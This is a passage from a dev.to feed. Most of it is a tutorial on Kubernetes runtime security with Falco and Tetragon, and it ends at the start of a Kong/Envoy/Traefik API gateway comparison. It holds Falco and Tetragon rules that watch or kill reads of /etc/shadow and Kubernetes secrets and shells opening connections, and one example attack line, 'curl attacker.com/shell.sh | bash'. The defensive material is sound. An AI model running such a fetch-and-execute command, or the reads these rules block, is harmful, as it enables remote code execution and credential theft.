     &lt;span class="s"&gt;fd.name startswith /etc/kubernetes/pki or&lt;/span&gt;
     &lt;span class="s"&gt;fd.name startswith /run/secrets/kubernetes.io)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Sensitive file read (file=%fd.name container=%container.name&lt;/span&gt;
    &lt;span class="s"&gt;command=%proc.cmdline)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;WARNING&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;filesystem&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;sensitive&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Deploy with Helm:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;helm &lt;span class="nb"&gt;install &lt;/span&gt;falco falcosecurity/falco &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; falco-system &lt;span class="nt"&gt;--create-namespace&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; falcosidekick.enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; falcosidekick.config.slack.webhookurl&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;SLACK_WEBHOOK&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; falcosidekick.config.alertmanager.hostport&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"http://alertmanager:9093"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set-file&lt;/span&gt; falco.rules_file[0]&lt;span class="o"&gt;=&lt;/span&gt;/path/to/falco-custom-rules.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Setting Up Tetragon for Enforcement
&lt;/h2&gt;

&lt;p&gt;Now the enforcement side. Tetragon uses &lt;code&gt;TracingPolicy&lt;/code&gt; custom resources to define what to monitor and how to respond:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TracingPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kill-reverse-shells&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;kprobes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;call&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tcp_connect"&lt;/span&gt;
      &lt;span class="na"&gt;syscall&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;args&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;
          &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sock"&lt;/span&gt;
      &lt;span class="na"&gt;selectors&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchBinaries&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;In&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/bin/bash&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/bin/sh&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/bin/dash&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/usr/bin/bash&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/usr/bin/sh&lt;/span&gt;
          &lt;span class="na"&gt;matchActions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sigkill&lt;/span&gt;
          &lt;span class="na"&gt;matchNamespaces&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pid&lt;/span&gt;
              &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;NotIn&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;host_ns"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This policy says: if &lt;code&gt;bash&lt;/code&gt;, &lt;code&gt;sh&lt;/code&gt;, or &lt;code&gt;dash&lt;/code&gt; attempts a TCP connection inside a container (not the host namespace), kill it immediately. No alert delay. No human in the loop. The reverse shell dies before the first byte crosses the wire.&lt;/p&gt;

&lt;p&gt;A more nuanced policy for file access:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TracingPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;protect-sensitive-files&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;kprobes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;call&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;security_file_open"&lt;/span&gt;
      &lt;span class="na"&gt;syscall&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;args&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;
          &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;file"&lt;/span&gt;
      &lt;span class="na"&gt;selectors&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchArgs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;
              &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Prefix&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/etc/shadow&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/etc/kubernetes/pki&lt;/span&gt;
          &lt;span class="na"&gt;matchActions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sigkill&lt;/span&gt;
          &lt;span class="na"&gt;matchNamespaces&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pid&lt;/span&gt;
              &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;NotIn&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;host_ns"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Deploy Tetragon:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;helm &lt;span class="nb"&gt;install &lt;/span&gt;tetragon cilium/tetragon &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; kube-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; tetragon.exportFilename&lt;span class="o"&gt;=&lt;/span&gt;/var/run/cilium/tetragon/tetragon.log &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; tetragon.enablePolicyFilter&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; tetragon.enableMsgHandlingLatency&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Real Attack Scenario: The Compromised npm Package
&lt;/h2&gt;

&lt;p&gt;Let's walk through a realistic attack and see how each tool responds.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The attack&lt;/strong&gt;: A developer installs a compromised npm package that, on import, spawns a child process running &lt;code&gt;curl attacker.com/shell.sh | bash&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Falco response&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Detects &lt;code&gt;bash&lt;/code&gt; spawned as child of &lt;code&gt;node&lt;/code&gt; (rule: "Shell Spawned by Non-Shell Program")&lt;/li&gt;
&lt;li&gt;Detects outbound network connection from &lt;code&gt;bash&lt;/code&gt; (rule: "Reverse Shell Detected")&lt;/li&gt;
&lt;li&gt;Sends alert to Slack + Alertmanager&lt;/li&gt;
&lt;li&gt;Total time from exploit to alert: &lt;strong&gt;~800ms&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Total time from exploit to human response: &lt;strong&gt;3-47 minutes&lt;/strong&gt; (depending on alerting pipeline and on-call response)&lt;/li&gt;
&lt;li&gt;The shell has been running the entire time&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Tetragon response&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;bash&lt;/code&gt; spawned as child of &lt;code&gt;node&lt;/code&gt; -- logged but allowed (process spawn is legitimate in many apps)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;bash&lt;/code&gt; attempts TCP connection -- &lt;strong&gt;SIGKILL sent in ~3 microseconds&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Process dies. Connection never established.&lt;/li&gt;
&lt;li&gt;Event exported for audit trail&lt;/li&gt;
&lt;li&gt;Total time from exploit to containment: &lt;strong&gt;&amp;lt;1ms&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The attacker got nothing. Not a single byte of data exfiltrated.&lt;/p&gt;

&lt;h2&gt;
  
  
  Performance Impact
&lt;/h2&gt;

&lt;p&gt;Security tools that slow your workloads are security tools that get disabled. We measured both on a 50-pod Kubernetes cluster running a mixed workload (API servers, message consumers, batch jobs):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;No security&lt;/th&gt;
&lt;th&gt;Falco&lt;/th&gt;
&lt;th&gt;Tetragon&lt;/th&gt;
&lt;th&gt;Both&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CPU overhead (per node)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+1.8%&lt;/td&gt;
&lt;td&gt;+0.9%&lt;/td&gt;
&lt;td&gt;+2.5%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory overhead (per node)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+180MB&lt;/td&gt;
&lt;td&gt;+95MB&lt;/td&gt;
&lt;td&gt;+260MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Syscall latency (p99)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+2.1μs&lt;/td&gt;
&lt;td&gt;+0.8μs&lt;/td&gt;
&lt;td&gt;+2.7μs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network latency (p99)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+0.3μs&lt;/td&gt;
&lt;td&gt;+0.2μs&lt;/td&gt;
&lt;td&gt;+0.4μs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Tetragon is measurably lighter than Falco. This surprised us initially, but it makes sense: Tetragon does its evaluation in-kernel via eBPF, while Falco copies events to a userspace process for rule evaluation. The kernel/userspace context switch adds overhead.&lt;/p&gt;

&lt;p&gt;Both tools are light enough to run simultaneously without meaningful production impact.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Which (Or Both)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Use Falco when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You need comprehensive audit logging (compliance requirements like SOC 2, PCI DSS)&lt;/li&gt;
&lt;li&gt;You want visibility into container behavior before writing enforcement policies&lt;/li&gt;
&lt;li&gt;Your rules need complex logic that eBPF can't express (Falco's rule engine is more flexible)&lt;/li&gt;
&lt;li&gt;You're just starting with runtime security and need to understand your baseline&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use Tetragon when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You know what should never happen and want to prevent it, not just detect it&lt;/li&gt;
&lt;li&gt;You need sub-millisecond response to threats&lt;/li&gt;
&lt;li&gt;You're running Cilium for networking (Tetragon integrates natively)&lt;/li&gt;
&lt;li&gt;You want enforcement at the kernel level without a userspace bottleneck&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use both when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You want defense in depth: Tetragon blocks known-bad, Falco detects unknown-suspicious&lt;/li&gt;
&lt;li&gt;Compliance requires both prevention and audit trails&lt;/li&gt;
&lt;li&gt;You're running a high-security workload (financial services, healthcare)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Our Recommended Architecture
&lt;/h2&gt;

&lt;p&gt;For most production Kubernetes clusters, we deploy both:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────┐
│ Kernel Level                                │
│  Tetragon eBPF → ENFORCE known threats      │
│  Falco eBPF    → DETECT suspicious activity │
└──────────────┬──────────────┬───────────────┘
               │              │
        ┌──────▼──────┐ ┌────▼──────────┐
        │ Tetragon    │ │ Falco         │
        │ Export JSON  │ │ Sidekick      │
        └──────┬──────┘ └────┬──────────┘
               │              │
        ┌──────▼──────────────▼───────────┐
        │ Loki / Elasticsearch            │
        │ (unified security event store)  │
        └──────────────┬──────────────────┘
                       │
        ┌──────────────▼──────────────────┐
        │ Grafana Dashboards + Alerts     │
        └─────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Tetragon handles the "never let this happen" policies (reverse shells, crypto miners, sensitive file access). Falco handles the "this looks weird, investigate" alerts (unusual process trees, unexpected network connections, privilege escalation attempts).&lt;/p&gt;

&lt;h2&gt;
  
  
  The Migration Path
&lt;/h2&gt;

&lt;p&gt;If you're running Falco today and considering Tetragon:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Deploy Tetragon in &lt;strong&gt;observe-only mode&lt;/strong&gt; (no &lt;code&gt;Sigkill&lt;/code&gt; actions) alongside Falco&lt;/li&gt;
&lt;li&gt;Run for 2 weeks. Compare Tetragon events against Falco alerts. Verify coverage overlap.&lt;/li&gt;
&lt;li&gt;Convert your highest-confidence Falco rules to Tetragon enforcement policies (start with reverse shells and crypto miners -- lowest false-positive risk)&lt;/li&gt;
&lt;li&gt;Gradually move more rules to enforcement as confidence grows&lt;/li&gt;
&lt;li&gt;Keep Falco for detection of novel threats that don't match enforcement patterns&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Don't rip out Falco and replace it with Tetragon overnight. The tools are complementary, and the migration needs bake time.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Container runtime security is one of the most impactful and least implemented layers of Kubernetes security. We help teams deploy, tune, and operate runtime security at scale. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Get in touch&lt;/a&gt; if you want to stop detecting breaches and start preventing them.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>infosec</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>API Gateway Patterns: Kong vs Envoy vs Traefik in 2025</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 05 May 2026 06:00:04 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/api-gateway-patterns-kong-vs-envoy-vs-traefik-in-2025-1d46</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/api-gateway-patterns-kong-vs-envoy-vs-traefik-in-2025-1d46</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/api-gateway-patterns-kong-envoy-traefik" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/api-gateway-patterns-kong-envoy-traefik?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=api-gateway-patterns-kong-envoy-traefik" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The API Gateway Role
&lt;/h2&gt;

&lt;p&gt;An API gateway sits between clients and your backend services. It handles cross-cutting concerns so your services do not have to: authentication, rate limiting, request routing, load balancing, caching, and observability.&lt;/p&gt;

&lt;p&gt;WebMobileIoTGatewayRate LimitAuthLoad BalanceTransformCacheService AService BService CDB / Cache&lt;/p&gt;
&lt;p&gt;API gateway pattern: a single entry point handles auth, rate limiting, and routing to backend services.&lt;/p&gt;

&lt;p&gt;Without an API gateway, every service implements its own auth middleware, rate limiter, and logging. With one, you centralize these concerns.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Three Contenders
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Kong: The Full-Featured Gateway
&lt;/h3&gt;

&lt;p&gt;Kong started as an Nginx-based API gateway and evolved into a comprehensive API management platform. It is the most feature-rich option.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Kong with Docker Compose&lt;/span&gt;
&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;kong-database&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;POSTGRES_DB&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong&lt;/span&gt;
      &lt;span class="na"&gt;POSTGRES_USER&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong&lt;/span&gt;
      &lt;span class="na"&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;secret&lt;/span&gt;

  &lt;span class="na"&gt;kong&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong:3.8&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;KONG_DATABASE&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PG_HOST&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong-database&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PG_USER&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PG_PASSWORD&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;secret&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PROXY_LISTEN&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.0.0.0:8000&lt;/span&gt;
      &lt;span class="na"&gt;KONG_ADMIN_LISTEN&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.0.0.0:8001&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;8000:8000"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;8001:8001"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kong route configuration&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a service&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/ &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;user-service &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;http://user-api:3000

&lt;span class="c"&gt;# Create a route&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/user-service/routes &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; paths[]&lt;span class="o"&gt;=&lt;/span&gt;/api/users &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;strip_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt;

&lt;span class="c"&gt;# Add rate limiting plugin&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/user-service/plugins &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;rate-limiting &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; config.minute&lt;span class="o"&gt;=&lt;/span&gt;100 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; config.policy&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;local&lt;/span&gt;

&lt;span class="c"&gt;# Add JWT authentication&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/user-service/plugins &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;jwt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Envoy: The Programmable Proxy
&lt;/h3&gt;

&lt;p&gt;Envoy is a high-performance L4/L7 proxy designed for cloud-native architectures. It is the data plane for Istio and many other service meshes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# envoy.yaml&lt;/span&gt;
&lt;span class="na"&gt;static_resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;listeners&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;main&lt;/span&gt;
      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.0.0.0&lt;/span&gt;
